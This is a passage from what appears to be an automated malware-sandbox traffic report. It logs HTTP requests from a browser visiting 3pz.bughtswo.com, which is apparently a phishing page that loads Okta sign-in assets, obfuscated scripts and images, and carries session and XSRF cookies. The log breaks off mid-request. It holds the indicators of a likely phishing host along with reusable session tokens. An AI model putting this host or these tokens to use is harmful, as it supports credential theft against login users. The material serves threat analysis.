XSRF-TOKEN=eyJpdiI6IktHQUp3RFVmK1puT2dOR1JSb1g0blE9PSIsInZhbHVlIjoiRXMyMkJlN3pYRlZlWWFMRklwMUkweG51ZDNjSXNQMzR3Y0Y1UmFYeUIwV3E2eDhVd0dhWm9Cb3FndE5IcFpHTXYyNWFyZUVIcmpoaTlxWThTMjFQYkMvUTJuMitFVFYvMjZvNG5MODZkeERQME5XY21HK1dkK1BaMnlBSko2SGkiLCJtYWMiOiIzYWZmM2QwMzcwY2I1YzUzNDNiNWE3ZjU3NjFlZWNkODZiMDYxNTgzM2Q2OWVlY2U5NmM4ZjY5ZWY5NmNiMTQ1IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlFMTU5mQ2FLWlE0azBtS25Nakw1VGc9PSIsInZhbHVlIjoibExPVmViZ2hNMUt2M3ZhWVRSNSt1bmZIYXNiY1p5QnZLVnF2VFF3a3diOVQ4RUNGV0N1UWppbHZRSVNOUnhzcEtvcDYrSGpiOUZ6VnNrKzJmbERwSkJoTVBCSkQ0by9KSGdGT3Q1YkVwUzNzN2RGV3Y5VlRjQ0hLSFFzTHlsWm4iLCJtYWMiOiI2MWQwMTllYWRjNDUxN2U4YzllMzlkNmU1YTJiOWEzOTg1OGUwZjg4ODc3Mjc2N2FhY2M1MDRlM2NjODlmOWE0IiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /fent/randexp.js/releases/download/v0.4.3/randexp.min.js HTTP/1.1Host: github.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://3pz.bughtswo.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /assets/js/sdk/okta-signin-widget/7.18.0/css/okta-sign-in.min.css HTTP/1.1Host: ok4static.oktacdn.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,/;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleSec-Fetch-Storage-Access: activeReferer: https://3pz.bughtswo.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /assets/loginpage/css/loginpage-theme.e0d37a504604ef874bad26435d62011f.css HTTP/1.1Host: ok4static.oktacdn.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,/;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleSec-Fetch-Storage-Access: activeReferer: https://3pz.bughtswo.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /GDSherpa-vf.woff2 HTTP/1.1Host: 3pz.bughtswo.comConnection: keep-aliveOrigin: https://3pz.bughtswo.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://3pz.bughtswo.com/pcjgktyoyaysvmnpsseafsrkslpumfzh9xa3ziatrn40zfgb8qgw?XDZZMGXXGMZWWSUFWLHJHAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IktHQUp3RFVmK1puT2dOR1JSb1g0blE9PSIsInZhbHVlIjoiRXMyMkJlN3pYRlZlWWFMRklwMUkweG51ZDNjSXNQMzR3Y0Y1UmFYeUIwV3E2eDhVd0dhWm9Cb3FndE5IcFpHTXYyNWFyZUVIcmpoaTlxWThTMjFQYkMvUTJuMitFVFYvMjZvNG5MODZkeERQME5XY21HK1dkK1BaMnlBSko2SGkiLCJtYWMiOiIzYWZmM2QwMzcwY2I1YzUzNDNiNWE3ZjU3NjFlZWNkODZiMDYxNTgzM2Q2OWVlY2U5NmM4ZjY5ZWY5NmNiMTQ1IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlFMTU5mQ2FLWlE0azBtS25Nakw1VGc9PSIsInZhbHVlIjoibExPVmViZ2hNMUt2M3ZhWVRSNSt1bmZIYXNiY1p5QnZLVnF2VFF3a3diOVQ4RUNGV0N1UWppbHZRSVNOUnhzcEtvcDYrSGpiOUZ6VnNrKzJmbERwSkJoTVBCSkQ0by9KSGdGT3Q1YkVwUzNzN2RGV3Y5VlRjQ0hLSFFzTHlsWm4iLCJtYWMiOiI2MWQwMTllYWRjNDUxN2U4YzllMzlkNmU1YTJiOWEzOTg1OGUwZjg4ODc3Mjc2N2FhY2M1MDRlM2NjODlmOWE0IiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /GDSherpa-vf2.woff2 HTTP/1.1Host: 3pz.bughtswo.comConnection: keep-aliveOrigin: https://3pz.bughtswo.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://3pz.bughtswo.com/pcjgktyoyaysvmnpsseafsrkslpumfzh9xa3ziatrn40zfgb8qgw?XDZZMGXXGMZWWSUFWLHJHAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IktHQUp3RFVmK1puT2dOR1JSb1g0blE9PSIsInZhbHVlIjoiRXMyMkJlN3pYRlZlWWFMRklwMUkweG51ZDNjSXNQMzR3Y0Y1UmFYeUIwV3E2eDhVd0dhWm9Cb3FndE5IcFpHTXYyNWFyZUVIcmpoaTlxWThTMjFQYkMvUTJuMitFVFYvMjZvNG5MODZkeERQME5XY21HK1dkK1BaMnlBSko2SGkiLCJtYWMiOiIzYWZmM2QwMzcwY2I1YzUzNDNiNWE3ZjU3NjFlZWNkODZiMDYxNTgzM2Q2OWVlY2U5NmM4ZjY5ZWY5NmNiMTQ1IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlFMTU5mQ2FLWlE0azBtS25Nakw1VGc9PSIsInZhbHVlIjoibExPVmViZ2hNMUt2M3ZhWVRSNSt1bmZIYXNiY1p5QnZLVnF2VFF3a3diOVQ4RUNGV0N1UWppbHZRSVNOUnhzcEtvcDYrSGpiOUZ6VnNrKzJmbERwSkJoTVBCSkQ0by9KSGdGT3Q1YkVwUzNzN2RGV3Y5VlRjQ0hLSFFzTHlsWm4iLCJtYWMiOiI2MWQwMTllYWRjNDUxN2U4YzllMzlkNmU1YTJiOWEzOTg1OGUwZjg4ODc3Mjc2N2FhY2M1MDRlM2NjODlmOWE0IiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /github-production-release-asset-2e65be/2925284/11f3acf8-4ccb-11e6-8ce4-c179c0a212de?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250318%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250318T005458Z&X-Amz-Expires=300&X-Amz-Signature=b818719a854c0e41447bb4b3f5401a207a6130937cb292bb6da819d77b602586&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Drandexp.min.js&response-content-type=application%2Foctet-stream HTTP/1.1Host: objects.githubusercontent.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://3pz.bughtswo.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /56usdLGyORYNk44l9ghb0mDtUEm8nDuuFwg67110 HTTP/1.1Host: 3pz.bughtswo.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://3pz.bughtswo.com/pcjgktyoyaysvmnpsseafsrkslpumfzh9xa3ziatrn40zfgb8qgw?XDZZMGXXGMZWWSUFWLHJHAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IktHQUp3RFVmK1puT2dOR1JSb1g0blE9PSIsInZhbHVlIjoiRXMyMkJlN3pYRlZlWWFMRklwMUkweG51ZDNjSXNQMzR3Y0Y1UmFYeUIwV3E2eDhVd0dhWm9Cb3FndE5IcFpHTXYyNWFyZUVIcmpoaTlxWThTMjFQYkMvUTJuMitFVFYvMjZvNG5MODZkeERQME5XY21HK1dkK1BaMnlBSko2SGkiLCJtYWMiOiIzYWZmM2QwMzcwY2I1YzUzNDNiNWE3ZjU3NjFlZWNkODZiMDYxNTgzM2Q2OWVlY2U5NmM4ZjY5ZWY5NmNiMTQ1IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlFMTU5mQ2FLWlE0azBtS25Nakw1VGc9PSIsInZhbHVlIjoibExPVmViZ2hNMUt2M3ZhWVRSNSt1bmZIYXNiY1p5QnZLVnF2VFF3a3diOVQ4RUNGV0N1UWppbHZRSVNOUnhzcEtvcDYrSGpiOUZ6VnNrKzJmbERwSkJoTVBCSkQ0by9KSGdGT3Q1YkVwUzNzN2RGV3Y5VlRjQ0hLSFFzTHlsWm4iLCJtYWMiOiI2MWQwMTllYWRjNDUxN2U4YzllMzlkNmU1YTJiOWEzOTg1OGUwZjg4ODc3Mjc2N2FhY2M1MDRlM2NjODlmOWE0IiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /klSe5FeF4V4B9AsN4kzckt7xcRfhr56nJ41v2BUS7L5ZHUtaQLGpmLSV8ukuv220 HTTP/1.1Host: 3pz.bughtswo.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://3pz.bughtswo.com/pcjgktyoyaysvmnpsseafsrkslpumfzh9xa3ziatrn40zfgb8qgw?XDZZMGXXGMZWWSUFWLHJHAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IktHQUp3RFVmK1puT2dOR1JSb1g0blE9PSIsInZhbHVlIjoiRXMyMkJlN3pYRlZlWWFMRklwMUkweG51ZDNjSXNQMzR3Y0Y1UmFYeUIwV3E2eDhVd0dhWm9Cb3FndE5IcFpHTXYyNWFyZUVIcmpoaTlxWThTMjFQYkMvUTJuMitFVFYvMjZvNG5MODZkeERQME5XY21HK1dkK1BaMnlBSko2SGkiLCJtYWMiOiIzYWZmM2QwMzcwY2I1YzUzNDNiNWE3ZjU3NjFlZWNkODZiMDYxNTgzM2Q2OWVlY2U5NmM4ZjY5ZWY5NmNiMTQ1IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlFMTU5mQ2FLWlE0azBtS25Nakw1VGc9PSIsInZhbHVlIjoibExPVmViZ2hNMUt2M3ZhWVRSNSt1bmZIYXNiY1p5QnZLVnF2VFF3a3diOVQ4RUNGV0N1UWppbHZRSVNOUnhzcEtvcDYrSGpiOUZ6VnNrKzJmbERwSkJoTVBCSkQ0by9KSGdGT3Q1YkVwUzNzN2RGV3Y5VlRjQ0hLSFFzTHlsWm4iLCJtYWMiOiI2MWQwMTllYWRjNDUxN2U4YzllMzlkNmU1YTJiOWEzOTg1OGUwZjg4ODc3Mjc2N2FhY2M1MDRlM2NjODlmOWE0IiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /klCOczC1guexDGXVCE0TqxcNG891JB3LCJ5AUxbOyWvzDab230 HTTP/1.1Host: 3pz.bughtswo.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://3pz.bughtswo.com/pcjgktyoyaysvmnpsseafsrkslpumfzh9xa3ziatrn40zfgb8qgw?XDZZMGXXGMZWWSUFWLHJHAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IktHQUp3RFVmK1puT2dOR1JSb1g0blE9PSIsInZhbHVlIjoiRXMyMkJlN3pYRlZlWWFMRklwMUkweG51ZDNjSXNQMzR3Y0Y1UmFYeUIwV3E2eDhVd0dhWm9Cb3FndE5IcFpHTXYyNWFyZUVIcmpoaTlxWThTMjFQYkMvUTJuMitFVFYvMjZvNG5MODZkeERQME5XY21HK1dkK1BaMnlBSko2SGkiLCJtYWMiOiIzYWZmM2QwMzcwY2I1YzUzNDNiNWE3ZjU3NjFlZWNkODZiMDYxNTgzM2Q2OWVlY2U5NmM4ZjY5ZWY5NmNiMTQ1IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlFMTU5mQ2FLWlE0azBtS25Nakw1VGc9PSIsInZhbHVlIjoibExPVmViZ2hNMUt2M3ZhWVRSNSt1bmZIYXNiY1p5QnZLVnF2VFF3a3diOVQ4RUNGV0N1UWppbHZRSVNOUnhzcEtvcDYrSGpiOUZ6VnNrKzJmbERwSkJoTVBCSkQ0by9KSGdGT3Q1YkVwUzNzN2RGV3Y5VlRjQ0hLSFFzTHlsWm4iLCJtYWMiOiI2MWQwMTllYWRjNDUxN2U4YzllMzlkNmU1YTJiOWEzOTg1OGUwZjg4ODc3Mjc2N2FhY2M1MDRlM2NjODlmOWE0IiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /klSe5FeF4V4B9AsN4kzckt7xcRfhr56nJ41v2BUS7L5ZHUtaQLGpmLSV8ukuv220 HTTP/1.1Host: 3pz.bughtswo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IktHQUp3RFVmK1puT2dOR1JSb1g0blE9PSIsInZhbHVlIjoiRXMyMkJlN3pYRlZlWWFMRklwMUkweG51ZDNjSXNQMzR3Y0Y1UmFYeUIwV3E2eDhVd0dhWm9Cb3FndE5IcFpHTXYyNWFyZUVIcmpoaTlxWThTMjFQYkMvUTJuMitFVFYvMjZvNG5MODZkeERQME5XY21HK1dkK1BaMnlBSko2SGkiLCJtYWMiOiIzYWZmM2QwMzcwY2I1YzUzNDNiNWE3ZjU3NjFlZWNkODZiMDYxNTgzM2Q2OWVlY2U5NmM4ZjY5ZWY5NmNiMTQ1IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlFMTU5mQ2FLWlE0azBtS25Nakw1VGc9PSIsInZhbHVlIjoibExPVmViZ2hNMUt2M3ZhWVRSNSt1bmZIYXNiY1p5QnZLVnF2VFF3a3diOVQ4RUNGV0N1UWppbHZRSVNOUnhzcEtvcDYrSGpiOUZ6VnNrKzJmbERwSkJoTVBCSkQ0by9KSGdGT3Q1YkVwUzNzN2RGV3Y5VlRjQ0hLSFFzTHlsWm4iLCJtYWMiOiI2MWQwMTllYWRjNDUxN2U4YzllMzlkNmU1YTJiOWEzOTg1OGUwZjg4ODc3Mjc2N2FhY2M1MDRlM2NjODlmOWE0IiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /klCOczC1guexDGXVCE0TqxcNG891JB3LCJ5AUxbOyWvzDab230 HTTP/1.1Host: 3pz.bughtswo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IktHQUp3RFVmK1puT2dOR1JSb1g0blE9PSIsInZhbHVlIjoiRXMyMkJlN3pYRlZlWWFMRklwMUkweG51ZDNjSXNQMzR3Y0Y1UmFYeUIwV3E2eDhVd0dhWm9Cb3FndE5IcFpHTXYyNWFyZUVIcmpoaTlxWThTMjFQYkMvUTJuMitFVFYvMjZvNG5MODZkeERQME5XY21HK1dkK1BaMnlBSko2SGkiLCJtYWMiOiIzYWZmM2QwMzcwY2I1YzUzNDNiNWE3ZjU3NjFlZWNkODZiMDYxNTgzM2Q2OWVlY2U5NmM4ZjY5ZWY5NmNiMTQ1IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlFMTU5mQ2FLWlE0azBtS25Nakw1VGc9PSIsInZhbHVlIjoibExPVmViZ2hNMUt2M3ZhWVRSNSt1bmZIYXNiY1p5QnZLVnF2VFF3a3diOVQ4RUNGV0N1UWppbHZRSVNOUnhzcEtvcDYrSGpiOUZ6VnNrKzJmbERwSkJoTVBCSkQ0by9KSGdGT3Q1YkVwUzNzN2RGV3Y5VlRjQ0hLSFFzTHlsWm4iLCJtYWMiOiI2MWQwMTllYWRjNDUxN2U4YzllMzlkNmU1YTJiOWEzOTg1OGUwZjg4ODc3Mjc2N2FhY2M1MDRlM2NjODlmOWE0IiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /yfuOUwyTI9qASHIO1Yd1WuHEVWTfcFf2n32Nn6H6lWun5L5SxS2l HTTP/1.1Host: 3pz.bughtswo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImZGMUFVc1RsUitTa1NhUXYvaCtvK1E9PSIsInZhbHVlIjoiK0I5QXNPWERMcFJvenVtNGg3RDNFajZPV1RtaXFYUDJteDZOOVU3eitibVUya2tienhIWklKaEpyenhzcS9YUjZoYU02bkVzUU9raUlGbUlaeHNra0tXSDQ0MzhDRVRrU2NyZktpMUw5NStJeDFmWCtFUlRwb0NOU2w5RSt1emEiLCJtYWMiOiIyN2NlNGZjMmU4MGE1NWUyYTBlMTdiNjUwZDBlNzJmN2ViZjg0ZTUzYzExMDYyODE2YThiNjM1YWZmZGU2ZGQ5IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlZ5SHJVUkJmaXVEQzFnbG5BOGp0Y3c9PSIsInZhbHVlIjoiaFdaSFp6bVVQcHhqWmZvejRzZnR3TDloaW9LRG01UkZWaWRMWDdIUGRYSi9wZzNtQjVka2htVTQxaEhmeGZOK0lZQWdMb1hvWGVDNlZMTy9tUC9tekRuQmxzMlYvZzlMbXlxSjdmeUJNVlZvWkNNdDBoTTlLWmtWVGYwaVQ0T0EiLCJtYWMiOiJhODcwNTAyNDRkMjUwZTdhZmQzNGY2MGI2NTQ3NzVlNGFkMzUzYzc1OWNhZDUxOTJjOGIzMTlhMmNmODgzYjI4IiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /wxB2I98tBROJelAq0Qq5WjZ6UMxcstFpC8Y9kgRgGII0H34126 HTTP/1.1Host: 3pz.bughtswo.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://3pz.bughtswo.com/pcjgktyoyaysvmnpsseafsrkslpumfzh9xa3ziatrn40zfgb8qgw?XDZZMGXXGMZWWSUFWLHJHAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImZGMUFVc1RsUitTa1NhUXYvaCtvK1E9PSIsInZhbHVlIjoiK0I5QXNPWERMcFJvenVtNGg3RDNFajZPV1RtaXFYUDJteDZOOVU3eitibVUya2tienhIWklKaEpyenhzcS9YUjZoYU02bkVzUU9raUlGbUlaeHNra0tXSDQ0MzhDRVRrU2NyZktpMUw5NStJeDFmWCtFUlRwb0NOU2w5RSt1emEiLCJtYWMiOiIyN2NlNGZjMmU4MGE1NWUyYTBlMTdiNjUwZDBlNzJmN2ViZjg0ZTUzYzExMDYyODE2YThiNjM1YWZmZGU2ZGQ5IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlZ5SHJVUkJmaXVEQzFnbG5BOGp0Y3c9PSIsInZhbHVlIjoiaFdaSFp6bVVQcHhqWmZvejRzZnR3TDloaW9LRG01UkZWaWRMWDdIUGRYSi9wZzNtQjVka2htVTQxaEhmeGZOK0lZQWdMb1hvWGVDNlZMTy9tUC9tekRuQmxzMlYvZzlMbXlxSjdmeUJNVlZvWkNNdDBoTTlLWmtWVGYwaVQ0T0EiLCJtYWMiOiJhODcwNTAyNDRkMjUwZTdhZmQzNGY2MGI2NTQ3NzVlNGFkMzUzYzc1OWNhZDUxOTJjOGIzMTlhMmNmODgzYjI4IiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /opuxRiSxTmEM15vBJMb9leXlu5sefNsAugLT2OPWIt7nw45140 HTTP/1.1Host: 3pz.bughtswo.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://3pz.bughtswo.com/pcjgktyoyaysvmnpsseafsrkslpumfzh9xa3ziatrn40zfgb8qgw?XDZZMGXXGMZWWSUFWLHJHAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImZGMUFVc1RsUitTa1NhUXYvaCtvK1E9PSIsInZhbHVlIjoiK0I5QXNPWERMcFJvenVtNGg3RDNFajZPV1RtaXFYUDJteDZOOVU3eitibVUya2tienhIWklKaEpyenhzcS9YUjZoYU02bkVzUU9raUlGbUlaeHNra0tXSDQ0MzhDRVRrU2NyZktpMUw5NStJeDFmWCtFUlRwb0NOU2w5RSt1emEiLCJtYWMiOiIyN2NlNGZjMmU4MGE1NWUyYTBlMTdiNjUwZDBlNzJmN2ViZjg0ZTUzYzExMDYyODE2YThiNjM1YWZmZGU2ZGQ5IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlZ5SHJVUkJmaXVEQzFnbG5BOGp0Y3c9PSIsInZhbHVlIjoiaFdaSFp6bVVQcHhqWmZvejRzZnR3TDloaW9LRG01UkZWaWRMWDdIUGRYSi9wZzNtQjVka2htVTQxaEhmeGZOK0lZQWdMb1hvWGVDNlZMTy9tUC9tekRuQmxzMlYvZzlMbXlxSjdmeUJNVlZvWkNNdDBoTTlLWmtWVGYwaVQ0T0EiLCJtYWMiOiJhODcwNTAyNDRkMjUwZTdhZmQzNGY2MGI2NTQ3NzVlNGFkMzUzYzc1OWNhZDUxOTJjOGIzMTlhMmNmODgzYjI4IiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /mnGeMwtuiseg6FuvHXI23EgklvYhJt1DtbpXmd9tZGrz78150 HTTP/1.1Host: 3pz.bughtswo.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://3pz.bughtswo.com/pcjgktyoyaysvmnpsseafsrkslpumfzh9xa3ziatrn40zfgb8qgw?XDZZMGXXGMZWWSUFWLHJHAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImZGMUFVc1RsUitTa1NhUXYvaCtvK1E9PSIsInZhbHVlIjoiK0I5QXNPWERMcFJvenVtNGg3RDNFajZPV1RtaXFYUDJteDZOOVU3eitibVUya2tienhIWklKaEpyenhzcS9YUjZoYU02bkVzUU9raUlGbUlaeHNra0tXSDQ0MzhDRVRrU2NyZktpMUw5NStJeDFmWCtFUlRwb0NOU2w5RSt1emEiLCJtYWMiOiIyN2NlNGZjMmU4MGE1NWUyYTBlMTdiNjUwZDBlNzJmN2ViZjg0ZTUzYzExMDYyODE2YThiNjM1YWZmZGU2ZGQ5IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlZ5SHJVUkJmaXVEQzFnbG5BOGp0Y3c9PSIsInZhbHVlIjoiaFdaSFp6bVVQcHhqWmZvejRzZnR3TDloaW9LRG01UkZWaWRMWDdIUGRYSi9wZzNtQjVka2htVTQxaEhmeGZOK0lZQWdMb1hvWGVDNlZMTy9tUC9tekRuQmxzMlYvZzlMbXlxSjdmeUJNVlZvWkNNdDBoTTlLWmtWVGYwaVQ0T0EiLCJtYWMiOiJhODcwNTAyNDRkMjUwZTdhZmQzNGY2MGI2NTQ3NzVlNGFkMzUzYzc1OWNhZDUxOTJjOGIzMTlhMmNmODgzYjI4IiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /kl3XiVz0aPutz6bSmjR9D2P593BDt6Z4DUWuOyzYQYdRIcPOAJBMuwV98WwDp5V256170 HTTP/1.1Host: 3pz.bughtswo.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://3pz.bughtswo.com/pcjgktyoyaysvmnpsseafsrkslpumfzh9xa3ziatrn40zfgb8qgw?XDZZMGXXGMZWWSUFWLHJHAccept-Encoding: gzip, deflate, br, zstdAccept-Language: 